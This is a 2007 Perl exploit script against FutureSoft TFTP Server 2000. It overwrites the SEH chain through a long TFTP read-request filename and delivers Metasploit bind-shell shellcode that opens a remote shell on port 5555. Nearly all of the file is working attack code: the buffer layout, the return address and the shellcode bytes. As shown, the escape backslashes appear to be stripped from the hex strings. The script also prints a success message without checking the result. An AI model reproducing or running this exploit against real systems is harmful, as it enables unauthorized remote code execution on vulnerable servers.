#!/usr/bin/perl
# ===============================================================================================
#                  FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit
#                               By Umesh Wanve
# ===============================================================================================
# 
# Date : 22-03-2007
#
# Tested on Windows 2000 SP4 Server English
#           Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
# 
# Stack --->      buffer                       ===  AAAAA.........
#                   |
#            Pointer to next SEH               ===  Short Jump to Hellcode  
#                   |
#               SEH Handler                    ===  Pop, Pop, Ret (ws2help.dll win2000 sp4)
#                   |
#                NOP Sled                      ===  Nop Sled
#                   | 
#                Hellcode                      ===  Hell.........
# 
# This exploit will open port 5555 on remote server. Connect it to open shell.
#
#
# P.S: This was written for educational purpose. Use it at your own risk.Author will be not be 
#      responsible for any damage.
#  
# Always Thanks to Metasploit. 
#
#==================================================================================================


use IO::Socket;
#use strict;

 
my($read_request)="x00x01";                                                # GET or PUT request

my($tailer)="x00x6ex65x74x61x73x63x69x69x00";                      #transporting mode (eg. netascii)   

                        
# win32_bind -  EXITFUNC=seh LPORT=5555 Size=344 Encoder=Pex http://metasploit.com
my($shellcode)=
"x90x90x90x90".                                          #padding
"x33xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0ex60".
"x5fx45x77x83xeexfcxe2xf4x9cx35xaex3ax88xa6xbax88".
"x9fx3fxcex1bx44x7bxcex32x5cxd4x39x72x18x5exaaxfc".
"x2fx47xcex28x40x5exaex3exebx6bxcex76x8ex6ex85xee".
"xccxdbx85x03x67x9ex8fx7ax61x9dxaex83x5bx0bx61x5f".
"x15xbaxcex28x44x5exaex11xebx53x0exfcx3fx43x44x9c".
"x63x73xcexfex0cx7bx59x16xa3x6ex9ex13xebx1cx75xfc".
"x20x53xcex07x7cxf2xcex37x68x01x2dxf9x2ex51xa9x27".
"x9fx89x23x24x06x37x76x45x08x28x36x45x3fx0bxbaxa7".
"x08x94xa8x8bx5bx0fxbaxa1x3fxd6xa0x11xe1xb2x4dx75".
"x35x35x47x88xb0x37x9cx7ex95xf2x12x88xb6x0cx16x24".
"x33x0cx06x24x23x0cxbaxa7x06x37x50xc4x06x0cxccx96".
"xf5x37xe1x6dx10x98x12x88xb6x35x55x26x35xa0x95x1f".
"xc4xf2x6bx9ex37xa0x93x24x35xa0x95x1fx85x16xc3x3e".
"x37xa0x93x27x34x0bx10x88xb0xccx2dx90x19x99x3cx20".
"x9fx89x10x88xb0x39x2fx13x06x37x26x1axe9xbax2fx27".
"x39x76x89xfex87x35x01xfex82x6ex85x84xcaxa1x07x5a".
"x9ex1dx69xe4xedx25x7dxdcxcbxf4x2dx05x9execx53x88".
"x15x1bxbaxa1x3bx08x17x26x31x0ex2fx76x31x0ex10x26".
"x9fx8fx2dxdaxb9x5ax8bx24x9fx89x2fx88x9fx68xbaxa7".
"xebx08xb9xf4xa4x3bxbaxa1x32xa0x95x1fx90xd5x41x28".
"x33xa0x93x88xb0x5fx45x77".
"x90x90x90x90".                                        #padding
"x90x90x90x90";

my($pointer_to_next_seh)="xebx06x90x90";               #short jump to shellcode

my($seh_handler)="xa9x11x02x75";                        #pop, pop, ret 
                                                            #(ws2help.dll win2000 sp4) 

#Building malicious buffer

my($buffer)=$read_request.("A" x 268).$pointer_to_next_seh.$seh_handler.$shellcode.$tailer;  


if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "69",

Proto    => "UDP"))
{
                
                 print "++Building Packet......n"  ;
		     print "++Connecting to server.....n";
		     print "++Sending Buffer ....n";
	           print "++Exploit Successfull...n";
                 print "++Connect to victim on 5555.....n";
	
                 # request + file name  + mode
                 #see tftp protocol

                 print $socket $buffer;      
                 sleep(1);
			
                 close($socket);
}
else
{
                 print "Cannot connect to $ARGV[0]:69n";
}
# __END_CODE 

# www.Syue.com [2007-03-22]